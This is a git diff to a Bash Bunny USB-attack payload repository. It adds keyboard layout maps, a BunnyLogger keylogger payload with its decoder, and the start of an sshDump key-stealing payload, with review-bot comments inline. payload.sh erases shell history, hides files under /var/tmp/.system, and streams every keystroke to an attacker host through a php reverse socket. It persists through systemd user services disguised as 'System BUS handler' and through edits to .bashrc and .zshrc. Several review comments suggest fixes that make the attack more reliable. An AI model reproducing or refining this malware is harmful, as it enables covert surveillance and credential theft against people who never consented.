diff --git a/README.md b/README.md index ecfd2491..257d1f1b 100644 --- a/README.md +++ b/README.md @@ -6,14 +6,14 @@ This repository contains payloads and extensions for the Hak5 Bash Bunny. Commun By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits. - [Purchase at Hak5](https://hak5.org/products/bash-bunny "Purchase at Hak5") -- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny "Documentation") -- [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Forums") +- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation") +- [Bash Bunny Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums") - Discord: [https://hak5.org/discord](https://hak5.org/discord) ![enter image description here](https://cdn.shopify.com/s/files/1/0068/2142/products/bash-bunny-mk2_001_c58d9658-b151-4328-af26-11eef3c47355_300x.jpg) ## Documentation -Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny). +Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/bash-bunny/) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny). ## Disclaimer Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution. 
diff --git a/languages/hu.json b/languages/hu.json new file mode 100644 index 00000000..71cae1fd --- /dev/null +++ b/languages/hu.json 
@@ -0,0 +1,187 @@ +{ + "__comment":"All numbers here are in hex format and 0x is ignored.", + "__comment":" ", + "__comment":"This list is in ascending order of 3rd byte (HID Usage ID).", + "__comment":" See section 10 Keyboard/Keypad Page (0x07)", + "__comment":" of document USB HID Usage Tables Version 1.12.", + "__comment":" ", + "__comment":"Definition of these 3 bytes can be found", + "__comment":" in section B.1 Protocol 1 (Keyboard)", + "__comment":" of document Device Class Definition for HID Version 1.11", + "__comment":" - byte 1: Modifier keys", + "__comment":" - byte 2: Reserved", + "__comment":" - byte 3: Keycode 1", + "__comment":" ", + "__comment":"Both documents can be obtained from link here", + "__comment":" http://www.usb.org/developers/hidpage/", + "__comment":" ", + "__comment":" Hungarian QWERTZ language made by Skeleton022", + "__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ", + "a":"00,00,04", + "b":"00,00,05", + "c":"00,00,06", + "d":"00,00,07", + "e":"00,00,08", + "f":"00,00,09", + "g":"00,00,0a", + "h":"00,00,0b", + "i":"00,00,0c", + "j":"00,00,0d", + "k":"00,00,0e", + "l":"00,00,0f", + "m":"00,00,10", + "n":"00,00,11", + "o":"00,00,12", + "p":"00,00,13", + "q":"00,00,14", + "r":"00,00,15", + "s":"00,00,16", + "t":"00,00,17", + "u":"00,00,18", + "v":"00,00,19", + "w":"00,00,1a", + "x":"00,00,1b", + "z":"00,00,1c", + "y":"00,00,1d", + "1":"00,00,1e", + "2":"00,00,1f", + "3":"00,00,20", + "4":"00,00,21", + "5":"00,00,22", + "6":"00,00,23", + "7":"00,00,24", + "8":"00,00,25", + "9":"00,00,26", + "ö":"00,00,27", + "ENTER":"00,00,28", + "ESC":"00,00,29", + "ESCAPE":"00,00,29", + "TAB":"00,00,2b", + " ":"00,00,2c", + "SPACE":"00,00,2c", + "ü":"00,00,2d", + "ó":"00,00,2e", + "ő":"00,00,2f", + "ú":"00,00,30", + "ű":"00,00,31", + "é":"00,00,33", + "á":"00,00,34", + "0":"00,00,35", + ",":"00,00,36", + ".":"00,00,37", + "-":"00,00,38", + "CAPSLOCK":"00,00,39", + "F1":"00,00,3a", + "F2":"00,00,3b", + "F3":"00,00,3c", + "F4":"00,00,3d", + "F5":"00,00,3e", + 
"F6":"00,00,3f", + "F7":"00,00,40", + "F8":"00,00,41", + "F9":"00,00,42", + "F10":"00,00,43", + "F11":"00,00,44", + "F12":"00,00,45", + "PRINTSCREEN":"00,00,46", + "SCROLLLOCK":"00,00,47", + "BREAK":"00,00,48", + "PAUSE":"00,00,48", + "INSERT":"00,00,49", + "HOME":"00,00,4a", + "PAGEUP":"00,00,4b", + "DEL":"00,00,4c", + "DELETE":"00,00,4c", + "END":"00,00,4d", + "PAGEDOWN":"00,00,4e", + "RIGHT":"00,00,4f", + "RIGHTARROW":"00,00,4f", + "LEFT":"00,00,50", + "LEFTARROW":"00,00,50", + "DOWN":"00,00,51", + "DOWNARROW":"00,00,51", + "UP":"00,00,52", + "UPARROW":"00,00,52", + "í":"00,00,64", + "APP":"00,00,65", + "MENU":"00,00,65", + "ALT-TAB":"00,00,71", + "CONTROL":"01,00,00", + "CTRL":"01,00,00", + "SHIFT":"02,00,00", + "A":"02,00,04", + "B":"02,00,05", + "C":"02,00,06", + "D":"02,00,07", + "E":"02,00,08", + "F":"02,00,09", + "G":"02,00,0a", + "H":"02,00,0b", + "I":"02,00,0c", + "J":"02,00,0d", + "K":"02,00,0e", + "L":"02,00,0f", + "M":"02,00,10", + "N":"02,00,11", + "O":"02,00,12", + "P":"02,00,13", + "Q":"02,00,14", + "R":"02,00,15", + "S":"02,00,16", + "T":"02,00,17", + "U":"02,00,18", + "V":"02,00,19", + "W":"02,00,1a", + "X":"02,00,1b", + "Z":"02,00,1c", + "Y":"02,00,1d", + "'":"02,00,1e", + "\"":"02,00,1f", + "+":"02,00,20", + "!":"02,00,21", + "%":"02,00,22", + "/":"02,00,23", + "=":"02,00,24", + "(":"02,00,25", + ")":"02,00,26", + "Ö":"02,00,27", + "Ü":"02,00,2d", + "Ó":"02,00,2e", + "Ő":"02,00,2f", + "Ú":"02,00,30", + "Ű":"02,00,31", + "É":"02,00,33", + "Á":"02,00,34", + "?":"02,00,36", + ":":"02,00,37", + "_":"02,00,38", + "Í":"02,00,64", + "CTRL-SHIFT":"03,00,00", + "ALT":"04,00,00", + "CTRL-ALT":"05,00,00", + "ALT-SHIFT":"06,00,00", + "COMMAND":"08,00,00", + "GUI":"08,00,00", + "WINDOWS":"08,00,00", + "COMMAND-OPTION":"12,00,00", + "COMMAND-CTRL-SHIFT":"12,00,00", + "COMMAND-CTRL":"12,00,00", + "COMMAND-OPTION-SHIFT'":"12,00,00", + "{":"40,00,05", + "&":"40,00,06", + "[":"40,00,09", + "]":"40,00,0a", + "}":"40,00,11", + "\\":"40,00,14", + "@":"40,00,19", + 
"|":"40,00,1a", + "#":"40,00,1b", + ">":"40,00,1d", + "~":"40,00,1e", + "^":"40,00,20", + "`":"40,00,24", + "$":"40,00,33", + ";":"40,00,36", + "*":"40,00,38", + "<":"40,00,64" +} diff --git a/languages/jp.json b/languages/jp.json new file mode 100644 index 00000000..9c3506fa --- /dev/null +++ b/languages/jp.json 
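Review bot: `"ALT-TAB":"00,00,71"` sends HID usage 0x71 (F22 in the 0x07 keyboard page) with no modifier, not Alt+Tab; the jp.json and tr.json tables in this same commit encode it as `"ALT-TAB":"04,00,2b"`, which is what this entry should be. The four macOS combos `COMMAND-OPTION`, `COMMAND-CTRL-SHIFT`, `COMMAND-CTRL` and `COMMAND-OPTION-SHIFT'` all map to the same `12,00,00`, and the last key carries a stray apostrophe, so a payload using `COMMAND-OPTION-SHIFT` cannot resolve it at all; jp.json uses the distinct modifier bytes `0C`, `0B`, `09` and `0E` for these. `BACKSPACE` (`00,00,2a`), present in the other two layouts, is missing here, so any payload that uses it will type nothing.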
@@ -0,0 +1,172 @@ +{ + "__comment": "All numbers here are in hex format and 0x is ignored.", + "__comment": " ", + "__comment": "This list is in ascending order of 3rd byte (HID Usage ID).", + "__comment": " See section 10 Keyboard/Keypad Page (0x07)", + "__comment": " of document USB HID Usage Tables Version 1.12.", + "__comment": " ", + "__comment": "Definition of these 3 bytes can be found", + "__comment": " in section B.1 Protocol 1 (Keyboard)", + "__comment": " of document Device Class Definition for HID Version 1.11", + "__comment": " - byte 1: Modifier keys", + "__comment": " - byte 2: Reserved", + "__comment": " - byte 3: Keycode 1", + "__comment": " ", + "__comment": "Both documents can be obtained from link here", + "__comment": " http://www.usb.org/developers/hidpage/", + "__comment": " ", + "__comment": "A = LeftShift + a, { = LeftShift + [", + "__comment": " ", + "CTRL": "01,00,00", + "CONTROL": "01,00,00", + "SHIFT": "02,00,00", + "ALT": "04,00,00", + "GUI": "08,00,00", + "WINDOWS": "08,00,00", + "CTRL-ALT": "05,00,00", + "CTRL-SHIFT": "03,00,00", + "ALT-SHIFT": "06,00,00", + "__comment": "Below 5 key combinations are for Mac OSX", + "__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal", + "COMMAND": "08,00,00", + "COMMAND-CTRL": "09,00,00", + "COMMAND-CTRL-SHIFT": "0B,00,00", + "COMMAND-OPTION": "0C,00,00", + "COMMAND-OPTION-SHIFT": "0E,00,00", + "a": "00,00,04", + "A": "02,00,04", + "b": "00,00,05", + "B": "02,00,05", + "c": "00,00,06", + "C": "02,00,06", + "d": "00,00,07", + "D": "02,00,07", + "e": "00,00,08", + "E": "02,00,08", + "f": "00,00,09", + "F": "02,00,09", + "g": "00,00,0a", + "G": "02,00,0a", + "h": "00,00,0b", + "H": "02,00,0b", + "i": "00,00,0c", + "I": "02,00,0c", + "j": "00,00,0d", + "J": "02,00,0d", + "k": "00,00,0e", + "K": "02,00,0e", + "l": "00,00,0f", + "L": "02,00,0f", + "m": "00,00,10", + "M": "02,00,10", + "n": "00,00,11", + "N": "02,00,11", + "o": "00,00,12", + "O": "02,00,12", + "p": "00,00,13", + "P": 
"02,00,13", + "q": "00,00,14", + "Q": "02,00,14", + "r": "00,00,15", + "R": "02,00,15", + "s": "00,00,16", + "S": "02,00,16", + "t": "00,00,17", + "T": "02,00,17", + "u": "00,00,18", + "U": "02,00,18", + "v": "00,00,19", + "V": "02,00,19", + "w": "00,00,1a", + "W": "02,00,1a", + "x": "00,00,1b", + "X": "02,00,1b", + "y": "00,00,1c", + "Y": "02,00,1c", + "z": "00,00,1d", + "Z": "02,00,1d", + "1": "00,00,1e", + "!": "02,00,1e", + "2": "00,00,1f", + "\"": "02,00,1f", + "3": "00,00,20", + "#": "02,00,20", + "4": "00,00,21", + "$": "02,00,21", + "5": "00,00,22", + "%": "02,00,22", + "6": "00,00,23", + "&": "02,00,23", + "7": "00,00,24", + "'": "02,00,24", + "8": "00,00,25", + "(": "02,00,25", + "9": "00,00,26", + ")": "02,00,26", + "0": "00,00,27", + "ENTER": "00,00,28", + "ESC": "00,00,29", + "ESCAPE": "00,00,29", + "BACKSPACE": "00,00,2a", + "TAB": "00,00,2b", + "ALT-TAB": "04,00,2b", + "SPACE": "00,00,2c", + " ": "00,00,2c", + "-": "00,00,2d", + "=": "02,00,2d", + "^": "00,00,2e", + "~": "02,00,2e", + "@": "00,00,2f", + "`": "02,00,2f", + "[": "00,00,30", + "{": "02,00,30", + "\\": "00,00,31", + "|": "02,00,31", + "]": "00,00,32", + "}": "02,00,32", + ";": "00,00,33", + "+": "02,00,33", + ":": "00,00,34", + "*": "02,00,34", + ",": "00,00,36", + "<": "02,00,36", + ".": "00,00,37", + ">": "02,00,37", + "/": "00,00,38", + "?": "02,00,38", + "CAPSLOCK": "00,00,39", + "F1": "00,00,3a", + "F2": "00,00,3b", + "F3": "00,00,3c", + "F4": "00,00,3d", + "F5": "00,00,3e", + "F6": "00,00,3f", + "F7": "00,00,40", + "F8": "00,00,41", + "F9": "00,00,42", + "F10": "00,00,43", + "F11": "00,00,44", + "F12": "00,00,45", + "PRINTSCREEN":"00,00,46", + "SCROLLLOCK": "00,00,47", + "PAUSE": "00,00,48", + "BREAK": "00,00,48", + "INSERT": "00,00,49", + "HOME": "00,00,4a", + "PAGEUP": "00,00,4b", + "DELETE": "00,00,4c", + "DEL": "00,00,4c", + "END": "00,00,4d", + "PAGEDOWN": "00,00,4e", + "RIGHTARROW": "00,00,4f", + "RIGHT": "00,00,4f", + "LEFTARROW": "00,00,50", + "LEFT": "00,00,50", + 
"DOWNARROW": "00,00,51", + "DOWN": "00,00,51", + "UPARROW": "00,00,52", + "UP": "00,00,52", + "NUMLOCK": "00,00,53", + "MENU": "00,00,65", + "APP": "00,00,65" +} diff --git a/languages/tr.json b/languages/tr.json new file mode 100644 index 00000000..77c63de4 --- /dev/null +++ b/languages/tr.json 
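Review bot: There is no entry for `_` (nor for `¥`), so a payload containing an underscore — common in file and variable names — silently drops the character; on a JIS keyboard `_` is Shift on the ろ key, HID usage 0x87 (International1), i.e. `"_": "02,00,87"`. Relatedly, `"\\": "00,00,31"` and `"|": "02,00,31"` use the US backslash usage; I believe a Japanese-layout host reports the backslash/yen keys as International1 (0x87) and International3 (0x89) and treats 0x31 like `]`/`}`, so these two mappings should be tested on a real JIS-layout machine before merging. A comment line stating which OS and layout the table was verified against would help the next contributor.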
@@ -0,0 +1,173 @@ +{ + "__comment": "All numbers here are in hex format and 0x is ignored.", + "__comment": " ", + "__comment": "This list is in ascending order of 3rd byte (HID Usage ID).", + "__comment": " See section 10 Keyboard/Keypad Page (0x07)", + "__comment": " of document USB HID Usage Tables Version 1.12.", + "__comment": " ", + "__comment": "Definition of these 3 bytes can be found", + "__comment": " in section B.1 Protocol 1 (Keyboard)", + "__comment": " of document Device Class Definition for HID Version 1.11", + "__comment": " - byte 1: Modifier keys", + "__comment": " - byte 2: Reserved", + "__comment": " - byte 3: Keycode 1", + "__comment": " ", + "__comment": "Both documents can be obtained from link here", + "__comment": " http://www.usb.org/developers/hidpage/", + "__comment": " ", + "__comment": "A = LeftShift + a, { = LeftShift + [", + "__comment": " ", + "CTRL": "01,00,00", + "CONTROL": "01,00,00", + "SHIFT": "02,00,00", + "ALT": "04,00,00", + "GUI": "08,00,00", + "WINDOWS": "08,00,00", + "CTRL-ALT": "05,00,00", + "CTRL-SHIFT": "03,00,00", + "ALT-SHIFT": "06,00,00", + "__comment": "Below 5 key combinations are for Mac OSX", + "__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal", + "COMMAND": "08,00,00", + "COMMAND-CTRL": "09,00,00", + "COMMAND-CTRL-SHIFT": "0B,00,00", + "COMMAND-OPTION": "0C,00,00", + "COMMAND-OPTION-SHIFT": "0E,00,00", + "a": "00,00,04", + "A": "02,00,04", + "b": "00,00,05", + "B": "02,00,05", + "c": "00,00,06", + "C": "02,00,06", + "d": "00,00,07", + "D": "02,00,07", + "e": "00,00,08", + "E": "02,00,08", + "f": "00,00,09", + "F": "02,00,09", + "g": "00,00,0a", + "G": "02,00,0a", + "h": "00,00,0b", + "H": "02,00,0b", + "i": "00,00,34", + "I": "02,00,0c", + "j": "00,00,0d", + "J": "02,00,0d", + "k": "00,00,0e", + "K": "02,00,0e", + "l": "00,00,0f", + "L": "02,00,0f", + "m": "00,00,10", + "M": "02,00,10", + "n": "00,00,11", + "N": "02,00,11", + "o": "00,00,12", + "O": "02,00,12", + "p": "00,00,13", + "P": 
"02,00,13", + "q": "00,00,14", + "Q": "02,00,14", + "r": "00,00,15", + "R": "02,00,15", + "s": "00,00,16", + "S": "02,00,16", + "t": "00,00,17", + "T": "02,00,17", + "u": "00,00,18", + "U": "02,00,18", + "v": "00,00,19", + "V": "02,00,19", + "w": "00,00,1a", + "W": "02,00,1a", + "x": "00,00,1b", + "X": "02,00,1b", + "y": "00,00,1c", + "Y": "02,00,1c", + "z": "00,00,1d", + "Z": "02,00,1d", + "1": "00,00,1e", + "!": "02,00,1e", + "2": "00,00,1f", + "@": "40,00,14", + "3": "00,00,20", + "#": "40,00,20", + "4": "00,00,21", + "$": "40,00,21", + "5": "00,00,22", + "%": "02,00,22", + "6": "00,00,23", + "^": "02,00,20", + "7": "00,00,24", + "&": "02,00,23", + "8": "00,00,25", + "*": "00,00,2d", + "9": "00,00,26", + "(": "02,00,25", + "0": "00,00,27", + ")": "02,00,26", + "ENTER": "00,00,28", + "ESC": "00,00,29", + "ESCAPE": "00,00,29", + "BACKSPACE": "00,00,2a", + "TAB": "00,00,2b", + "ALT-TAB": "04,00,2b", + "SPACE": "00,00,2c", + " ": "00,00,2c", + "-": "00,00,2e", + "_": "02,00,2e", + "=": "02,00,27", + "+": "02,00,21", + "[": "40,00,25", + "{": "40,00,24", + "]": "40,00,26", + "}": "40,00,27", + "\\": "40,00,2d", + "|": "40,00,2e", + ";": "02,00,31", + ":": "02,00,38", + "'": "02,00,1f", + "\"": "00,00,35", + "`": "40,00,31", + "~": "40,00,30", + ",": "00,00,31", + "<": "40,00,35", + ".": "00,00,38", + ">": "40,00,1e", + "/": "02,00,24", + "?": "02,00,2d", + "CAPSLOCK": "00,00,39", + "F1": "00,00,3a", + "F2": "00,00,3b", + "F3": "00,00,3c", + "F4": "00,00,3d", + "F5": "00,00,3e", + "F6": "00,00,3f", + "F7": "00,00,40", + "F8": "00,00,41", + "F9": "00,00,42", + "F10": "00,00,43", + "F11": "00,00,44", + "F12": "00,00,45", + "PRINTSCREEN":"00,00,46", + "SCROLLLOCK": "00,00,47", + "PAUSE": "00,00,48", + "BREAK": "00,00,48", + "INSERT": "00,00,49", + "HOME": "00,00,4a", + "PAGEUP": "00,00,4b", + "DELETE": "00,00,4c", + "DEL": "00,00,4c", + "END": "00,00,4d", + "PAGEDOWN": "00,00,4e", + "RIGHTARROW": "00,00,4f", + "RIGHT": "00,00,4f", + "LEFTARROW": "00,00,50", + "LEFT": 
"00,00,50", + "DOWNARROW": "00,00,51", + "DOWN": "00,00,51", + "UPARROW": "00,00,52", + "UP": "00,00,52", + "NUMLOCK": "00,00,53", + "MENU": "00,00,65", + "APP": "00,00,65" +} diff --git a/payloads/library/credentials/BunnyLogger/README.md b/payloads/library/credentials/BunnyLogger/README.md new file mode 100644 index 00000000..7c19270f --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/README.md 
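Review bot: None of the Turkish letters (ç, ğ, ı, ö, ş, ü and their capitals) are mapped, although the table otherwise follows the Turkish-Q layout (`i` on 0x34, `.` on 0x38), so a `Q STRING` containing one of them types nothing; the Hungarian table in this same commit does include its accented letters. If my reading of the Turkish-Q layout is right, the additions are `"ş": "00,00,33"`, `"ç": "00,00,37"`, `"ö": "00,00,36"`, `"ğ": "00,00,2f"`, `"ü": "00,00,30"` and `"ı": "00,00,0c"`, with `02` in the modifier byte for the capitals — please verify on a Turkish-layout host. The `"__comment": "A = LeftShift + a, { = LeftShift + ["` line copied from the US table is wrong for this layout (`{` is AltGr+7 here) and should be corrected or dropped.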
@@ -0,0 +1,62 @@ +## About: +* Title: BunnyLogger +* Description: Key logger which sends each and every key stroke of target remotely/locally. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Credentials +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker. + +### Features: +* Live keystroke capturing. +* Detailed key logs. +* Persistent +* Autostart payload on boot. + +### Workflow: +* Encoding payload and injecting on target's system. +* Checks whether internet is connected to the target system. +* If internet is connected then it sends raw keystrokes to attacker. +* Attacker processes raw keystrokes. + +### Changes to be made in payload.sh: +* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`. +* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payload/switch1/ | +| payload.sh | /payload/ | +| xinput | /tools/ | + +### Usage: +1. Encode payload.txt and inject into target's system. +2. Start netcat listner on attacking system: + +* `nc -lvp > ` use this command to create new logfile with raw keystrokes. +* `nc -lvp >> ` use this command to append raw keystrokes to existing logfile. +3. Process raw keystrokes using BunnyLoggerDecoder utility: +``` +./bunnyLoggerDecoder +bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger. + +Usage: +Decode captured log: [./bunnyLoggerDecoder -f -m -o ] + +Options: +-f Specify Log file. +-m Select Mode(normal|informative) +-o Specify Output file. +-h For this banner. 
+``` + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder b/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder new file mode 100644 index 00000000..c4aa994d --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder @@ -0,0 +1,50 @@ +usage () { + echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n" + echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f -m -o ]"; + echo -e "\nOptions:" + echo -e "-f\tSpecify Log file." + echo -e "-m\tSelect Mode(normal|informative)" + echo -e "-o\tSpecify Output file." + echo -e "-h\tFor this banner." +} +while getopts o:m:f:h: flag +do + case "${flag}" in + o) output=$OPTARG ;; + m) mode=$OPTARG ;; + f) filename=$OPTARG ;; + h) help=$OPTARG ;; + *) + usage + exit 1 + esac +done + +if [ -z "$output" ] && [ -z "$filename" ]; then + usage + exit 1 +fi +if [ -z "$filename" ]; then + echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2 + exit 1 +fi +if [ -z "$output" ]; then + echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ -z "$mode" ]; then + echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then + echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ "$mode" == "normal" ] ; then + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output + exit 1 +fi +if [ "$mode" == "informative" ] ; then + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output + exit 1 +fi 
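Review bot: `-h` is declared as `h:` in `while getopts o:m:f:h: flag`, so a bare `-h` is reported as a missing argument and only reaches `usage` through the `*)` arm, while `-h anything` just stores the word in `$help` and is otherwise ignored; both success paths also end with `exit 1`, so callers cannot tell success from the error cases. Change the option string to `while getopts o:m:f:h flag`, make the arm `h) usage; exit 0 ;;`, and use `exit 0` after each awk pipeline. `$filename` and `$output` are passed unquoted to awk and the redirection; quote them. The decoder resolves keycodes through the operator's own `xmodmap -pke`, so the output is only accurate when the attacker machine's X keymap matches the target's — that caveat belongs in the README's usage section.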
diff --git a/payloads/library/credentials/BunnyLogger/payload.sh b/payloads/library/credentials/BunnyLogger/payload.sh new file mode 100644 index 00000000..90d1ea36 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/payload.sh 
@@ -0,0 +1,24 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/tools/xinput /var/tmp/.system/ +echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys +chmod +x /var/tmp/.system/sys +chmod +x /var/tmp/.system/xinput +echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot +chmod +x /var/tmp/.system/reboot +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +systemctl --user enable --now reboot.service +systemctl --user start --now reboot.service +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? 
= 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp +chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit diff --git a/payloads/library/credentials/BunnyLogger/payload.txt b/payloads/library/credentials/BunnyLogger/payload.txt new file mode 100644 index 00000000..f9c67969 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/payload.txt @@ -0,0 +1,56 @@ +# Title: BunnyLogger +# Description: Key logger which sends each and every key stroke of target remotely/locally. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Credentials +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 2000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/credentials/BunnyLogger/xinput b/payloads/library/credentials/BunnyLogger/xinput new file mode 100644 index 00000000..b9a54988 Binary files /dev/null and b/payloads/library/credentials/BunnyLogger/xinput differ 
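Review bot: In the `echo -e "while :\n..."` that writes `/var/tmp/.system/systemBus`, `$?` is not escaped, so it is expanded while the file is being written and the generated loop reads `if [ 0 -eq 0 ]`; the `ping -c 5` reachability check is therefore dead and the php connect-back is attempted on every iteration (the later `~/tmmmp` writer escapes it correctly as `\$?`). Write `if ping -c 5 0.0.0.0; then` (or at least `\$?`) instead. Both generated units use `WantedBy=multi-user.target` under `systemctl --user`, but the user manager never reaches `multi-user.target`, so `enable` does not start them at login — `default.target` is the user-session equivalent; this is presumably why the payload also appends `systemctl --user enable --now` lines to `.bashrc`/`.zshrc`. The loop also requires `php` on the target, which the README's target line ("Unix-like operating systems with systemd") does not mention, and `rm -f $HISTFILE` runs after `unset HISTFILE`, so it removes nothing.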
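Review bot: The script is copied from `$mntt/payloads/payload.sh`, i.e. the udisk's top-level `payloads/` directory, while the README table says `payload.sh` lives in `/payload/` and `payload.txt` in `/payload/switch1/`; one of the two is wrong, and a user following the README gets a `cp` failure. Device discovery with `lsblk | grep 1.8G` matches any 1.8 GiB device or partition on the host; since the Bunny's volume is labelled `BashBunny` (the MacOS_EICAR payload in this commit mounts it at `/Volumes/BashBunny`), a label lookup such as `disk=$(lsblk -nro NAME,LABEL | awk '$2=="BashBunny"{print $1}')`, with the same Bunny-side escaping the existing awk line uses, is more robust. As far as I know `udisksctl mount -b` takes no mount-point argument, so the trailing `/tmp/tmppp` is ignored at best and the later `lsblk ... $7` lookup is what actually finds the mount. The same discovery/mount sequence is repeated in the sshDump and intel payloads, so it is worth fixing in all three.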
diff --git a/payloads/library/credentials/sshDump/payload.txt b/payloads/library/credentials/sshDump/payload.txt new file mode 100644 index 00000000..01ee9ad0 --- /dev/null +++ b/payloads/library/credentials/sshDump/payload.txt @@ -0,0 +1,49 @@ +# Title: sshDump +# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Credentials +# Target: GNU/Linux. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 